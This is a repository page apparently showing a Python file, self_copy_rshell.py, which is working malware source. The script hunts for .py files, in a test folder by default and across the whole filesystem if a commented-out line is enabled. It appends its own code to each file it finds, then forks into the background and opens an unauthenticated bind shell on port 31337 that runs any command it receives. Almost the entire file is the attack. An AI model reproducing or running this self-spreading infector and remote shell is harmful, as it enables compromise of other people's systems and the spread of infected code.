aaron/python-rshell
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
6a1d065e5dc2ee5cfc24833a3bb3e5feedd821d8
python-rshell/self_copy_rshell.py
id101010 6a1d065e5d Putting it all together
2019-10-11 14:11:30 +02:00

67 lines
3.3 KiB
Python
Raw Blame History

import os #!x
import sys #!x
import glob #!x
import socket #!x
import string #!x
# search command, adjust to your needs
#cmd = 'find / -name "*.py" -print' #!x
cmd = 'find ./victims -name "*.py" -print' #!x
# keyword which prevents file from getting infected
keyword = 'plsdontinjectme' #!x
# for each file that matches the search command
for snippet in os.popen(cmd).readlines(): #!x
# strip newlines
snippet = snippet[:-1] #!x
try: #!x
# open this file containing the target code
code = open(__file__, 'r') #!x
# open victim file
victim = open(snippet, 'r') #!x
# read the content of the victim file
read_victim = victim.read() #!x
# if the file contains keyword, do not inject code
if str.find(read_victim, keyword) == -1: #!x
# open it with write_append rights
victim = open(snippet, 'a') #!x
# for each line in
for line in code.readlines(): #!x
# if the line contains the copy signal
if("#!x") in line: #!x
# close the code file
code.close() #!x
# cast the line containing code
insert=(line) #!x
# insert the code into the victim file
victim.write(insert) #!x
# poor mans error handling
except IOError: #!x
a = 1 #!x
# fork to bg
pid = os.fork() #!x
# make sure we are in the child process
if pid > 0: #!x
sys.exit(0)
try: #!x
# create the socket and listen
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x
s.bind(("0.0.0.0",31337)) #!x
s.listen(1) #!x
# poor mans socket error handling
except socket.error as e: #!x
print(e) #!x
sys.exit(0) #!x
# forever try to accept new connections
while 1: #!x
(cli,add) = s.accept() #!x
info = {"platform":sys.platform, "version":sys.version} #!x
welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x
cli.send(welcome.encode('utf-8')) #!x
# forever receive cli commends, execute and report back
while 1: #!x
data = cli.recv(1024).rstrip() #!x
resp = os.popen(data.decode('utf-8')).read() #!x
cli.send(resp.encode('utf-8')) #!x
Reference in New Issue View Git Blame Copy Permalink